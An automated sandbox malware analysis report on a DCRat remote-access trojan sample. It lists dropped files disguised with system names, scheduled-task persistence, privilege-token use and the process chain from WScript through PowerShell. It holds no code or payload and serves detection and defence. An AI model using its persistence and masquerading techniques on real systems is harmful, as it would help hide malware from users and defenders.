Malware Analysis Report

2025-08-05 17:32

Sample ID 221101-mq9fjabhem
Target d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a
SHA256 d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a
Tags
rat dcrat infostealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a

Threat Level: Known bad

The file d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a was found to be: Known bad.

Malicious Activity Summary

rat dcrat infostealer

Dcrat family

Process spawned unexpected child process

DCRat payload

DcRat

DCRat payload

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-11-01 10:41

Signatures

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Dcrat family

dcrat

Analysis: behavioral1

Detonation Overview

Submitted

2022-11-01 10:41

Reported

2022-11-01 10:43

Platform

win10-20220901-en

Max time kernel

146s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe"

Signatures

DcRat

rat infostealer dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Windows Media Player\winlogon.exe C:\providercommon\DllCommonsvc.exe N/A
File created C:\Program Files\Windows Media Player\cc11b995f2a76d C:\providercommon\DllCommonsvc.exe N/A
File created C:\Program Files\Windows Security\BrowserCore\fontdrvhost.exe C:\providercommon\DllCommonsvc.exe N/A
File created C:\Program Files\Windows Security\BrowserCore\5b884080fd4f94 C:\providercommon\DllCommonsvc.exe N/A
File created C:\Program Files\Windows Portable Devices\spoolsv.exe C:\providercommon\DllCommonsvc.exe N/A
File created C:\Program Files\Windows Portable Devices\f3b6ecef712a24 C:\providercommon\DllCommonsvc.exe N/A
File created C:\Program Files\Uninstall Information\dllhost.exe C:\providercommon\DllCommonsvc.exe N/A
File created C:\Program Files\Uninstall Information\5940a34987c991 C:\providercommon\DllCommonsvc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\twain_32\spoolsv.exe C:\providercommon\DllCommonsvc.exe N/A
File created C:\Windows\twain_32\f3b6ecef712a24 C:\providercommon\DllCommonsvc.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe C:\providercommon\DllCommonsvc.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\ebf1f9fa8afd6d C:\providercommon\DllCommonsvc.exe N/A
File created C:\Windows\InfusedApps\Packages\Microsoft.XboxSpeechToTextOverlay_1.14.2002.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\System.exe C:\providercommon\DllCommonsvc.exe N/A
File created C:\Windows\appcompat\appraiser\Telemetry\spoolsv.exe C:\providercommon\DllCommonsvc.exe N/A
File created C:\Windows\appcompat\appraiser\Telemetry\f3b6ecef712a24 C:\providercommon\DllCommonsvc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\providercommon\DllCommonsvc.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\providercommon\DllCommonsvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1460 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe C:\Windows\SysWOW64\WScript.exe
PID 1460 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe C:\Windows\SysWOW64\WScript.exe
PID 1460 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe C:\Windows\SysWOW64\WScript.exe
PID 4512 wrote to memory of 4736 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4512 wrote to memory of 4736 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4512 wrote to memory of 4736 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4736 wrote to memory of 3104 N/A C:\Windows\SysWOW64\cmd.exe C:\providercommon\DllCommonsvc.exe
PID 4736 wrote to memory of 3104 N/A C:\Windows\SysWOW64\cmd.exe C:\providercommon\DllCommonsvc.exe
PID 3104 wrote to memory of 2248 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 2248 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 2472 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 2472 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 2548 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 2548 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4796 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4796 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3912 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3912 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 5112 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 5112 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4052 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4052 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4440 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4440 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3420 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3420 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3624 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3624 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 2772 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
